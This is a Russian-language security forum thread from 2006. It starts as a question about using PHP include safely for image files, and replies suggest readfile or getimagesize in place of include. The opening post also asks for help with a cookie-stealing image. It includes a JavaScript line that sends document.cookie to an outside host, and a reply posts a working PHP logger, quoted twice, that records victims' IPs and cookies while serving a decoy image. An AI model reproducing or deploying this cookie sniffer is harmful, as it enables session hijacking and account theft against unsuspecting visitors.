FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Безопасное использование include

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Безопасное использование include

14.05.2006, 18:47

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Отправить сообщение для EST a1ien с помощью ICQ

Безопасное использование include

Есть скрипт ему передаётся параметр img.
Например script.php?img=http://site.ru/img.gif
Дак вот я зделал такую проверку

PHP код:


		
			
if (!strstr($image,'.gif')=='.gif') {$image='sm.gif';}

Дальше идёт

PHP код:


		
			
Header("Content-type: image/gif");
include($image);

Тоесть файл обязательно должен быть .gif , но этого недостаточно так как в img.gif может быть PHP код и он выполнится ведь так??
Если да то как от этого защитится??
-------------------------------
И ещё один вопрос как отобразить через javascript картинку которая является снифером.
Например

Код:

img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;

Img.gif это php скрипт который выводит картинку но таким javascript'ом она невыводится только тырятся куки , а нужен скрипт который и тырит куки и отображает картинку, если это возможно.

14.05.2006, 19:57

nerezus

Флудер

Регистрация: 12.08.2004

Сообщений: 3,791

Провел на форуме:
6490435

Репутация: 2290

Отправить сообщение для nerezus с помощью ICQ

Что за бред? Зачем инклюдить, кстати: Юзай http://us3.php.net/readfile =)

14.05.2006, 19:58

LoFFi

Участник форума

Регистрация: 21.02.2006

Сообщений: 285

Провел на форуме:
1347867

Репутация: 408

Отправить сообщение для LoFFi с помощью ICQ

попробуй

PHP код:


		
			
<?

...

if (!strstr($image,'.gif')=='.gif') {$image='sm.gif';}  

header("Content-Type: image/gif");

$ff = fopen($image,"rb");

fpassthru($ff);

fclose($ff);

?>

14.05.2006, 20:04

LoFFi

Участник форума

Регистрация: 21.02.2006

Сообщений: 285

Провел на форуме:
1347867

Репутация: 408

Да, и вот тебе пример сниффа....

PHP код:


		
			
<?

$query = $_SERVER['QUERY_STRING'];

$ip = $_SERVER['REMOTE_ADDR'];



if(!file_exists("log.txt")) fclose(fopen("log.txt","w"));

$out = fopen("log.txt","a");

fputs($out,"IP:".$ip."Query:".$query);

fclose($out);



header("Content-Type: image/jpg");

$img = fopen("image.jpg","rb");

fpassthru($img);

fclose($img);

?>

15.05.2006, 09:07

Trinux

Познавший АНТИЧАТ

Регистрация: 26.11.2004

Сообщений: 1,149

Провел на форуме:
941818

Репутация: 569

2 EST a1ien
А это и есть ответ на второй вопрос...

Цитата:

Сообщение от LoFFi

Да, и вот тебе пример сниффа....

PHP код:


		
			
<?

$query = $_SERVER['QUERY_STRING'];

$ip = $_SERVER['REMOTE_ADDR'];



if(!file_exists("log.txt")) fclose(fopen("log.txt","w"));

$out = fopen("log.txt","a");

fputs($out,"IP:".$ip."Query:".$query);

fclose($out);



header("Content-Type: image/jpg");

$img = fopen("image.jpg","rb");

fpassthru($img);

fclose($img);

?>

14.05.2006, 20:13

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

На первый вопрос ответили всем спасибо.
Теперь бы хотелось услышать ответ на второй.

Последний раз редактировалось EST a1ien; 14.05.2006 в 20:20..

14.05.2006, 20:23

nerezus

Флудер

Регистрация: 12.08.2004

Сообщений: 3,791

Провел на форуме:
6490435

Репутация: 2290

2. Фильтровать все вводимые значения.

15.05.2006, 07:14

Trinux

Познавший АНТИЧАТ

Регистрация: 26.11.2004

Сообщений: 1,149

Провел на форуме:
941818

Репутация: 569

Ага, с добрым утром всех.
getimagesize() еще никто не отменял. Да и как правильно заметил nerezus, readfile более оптимальное решение для поставленной задачи. Тестировал скорость работы readfile и include (хотя че тут тестить - ежу понятно что include тормознее в разы). Да и потом если ты делаешь header() с заголовком картинки, а потом readfile()...

Насчет твоего второго вопроса - все просто, скрипт подкинул LoFFi.

2 LoFFi
в данном примере проще юзать readfile, чем fopen.

15.05.2006, 07:42

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Всё с первым я уже разобрался, просто забыл про readfile совсем из головы вылетела, что можно читать, а не инклудить файлы.
А на второй вопрос я так и неполучил чёткого ответа.

#10

15.05.2006, 07:54

Trinux

Познавший АНТИЧАТ

Регистрация: 26.11.2004

Сообщений: 1,149

Провел на форуме:
941818

Репутация: 569

Цитата:

А на второй вопрос я так и неполучил чёткого ответа.

ошибаешься

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Великобритания введет налог на использование офисных компьютеров в личных целях	TaNkist	Мировые новости. Обсуждения.	1	02.05.2006 18:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ